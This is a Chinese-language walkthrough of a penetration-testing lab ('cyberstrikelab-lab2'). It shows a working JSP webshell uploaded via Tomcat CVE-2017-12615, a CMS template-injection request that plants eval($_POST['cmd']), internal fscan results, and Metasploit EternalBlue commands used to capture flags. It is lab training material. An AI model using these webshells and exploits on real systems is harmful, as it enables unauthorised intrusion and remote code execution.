cyberstrikelab-lab2

攻防渗透
, ,

信息收集

看看fscan的扫描记录

可以看到扫出来个cve,还有个骑士的站先试试再说

cve-2017-12615

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
<%!
    class U extends ClassLoader {
        U(ClassLoader c) {
            super(c);
        }
        public Class g(byte[] b) {
            return super.defineClass(b, 0, b.length);
        }
    }

    public byte[] base64Decode(String str) throws Exception {
        try {
            Class clazz = Class.forName("sun.misc.BASE64Decoder");
            return (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);
        } catch (Exception e) {
            Class clazz = Class.forName("java.util.Base64");
            Object decoder = clazz.getMethod("getDecoder").invoke(null);
            return (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);
        }
    }
%>
<%
    String cls = request.getParameter("ant");
    if (cls != null) {
        new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext);
    }
%>

蚁剑连接

再来看看74这个站有啥洞去搜搜

泄漏了版本

参考: https://www.cnblogs.com/r00tuser/p/14028067.html

可以打文件包含

然后在去读取flag试试,好像不太行

参考: https://blog.csdn.net/weixin_50887021/article/details/120383773
又去试试后台,爆破下 是admin/admin123456

1
2
3
4
5
6
7
8
9
10
GET /index.php?m=admin&c=tpl&a=set&tpl_dir=','a',eval($_POST['cmd']),' HTTP/1.1
Host: 192.168.10.10:808
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.10.10:808/index.php?m=admin&c=tpl&a=index
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=qm2f6p10m5plkrpqpdjtfam8n2; think_template=default; think_language=zh-CN
Connection: keep-alive

访问该Application/Home/Conf/config.php

内网渗透

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
fscan.exe -h 192.168.20.20/24

start infoscan

(icmp) Target 192.168.20.20   is alive

(icmp) Target 192.168.20.30   is alive

[*] Icmp alive hosts len is: 2

192.168.20.20:139 open

192.168.20.30:135 open

192.168.20.30:88 open

192.168.20.20:8080 open

192.168.20.30:445 open

192.168.20.30:139 open

192.168.20.20:135 open

192.168.20.20:8009 open

192.168.20.20:445 open

[*] alive ports len is: 9

start vulscan

[*] NetInfo 

[*]192.168.20.30

   [->]WIN-7NRTJO59O7N

   [->]192.168.20.30

[*] WebTitle [http://192.168.20.20:8080](http://192.168.20.20:8080/) code:200 len:11432  title:Apache Tomcat/8.5.19

[*] NetBios 192.168.20.20   cyberweb.cyberstrikelab.com         Windows Server 2012 R2 Standard 9600

[+] MS17-010 192.168.20.30    (Windows Server 2008 R2 Standard 7600)

[+] PocScan [http://192.168.20.20:8080](http://192.168.20.20:8080/) poc-yaml-iis-put-getshell 

[+] PocScan [http://192.168.20.20:8080](http://192.168.20.20:8080/) poc-yaml-tomcat-cve-2017-12615-rce

发现永恒之蓝打一下

永恒之蓝

1
2
3
4
5
proxychains4 msfconsole 
use exploit/windows/smb/ms17_010_eternalblue 
set payload windows/x64/meterpreter/bind_tcp_uuid
set rhosts 192.168.20.30
exploit

拿到flag。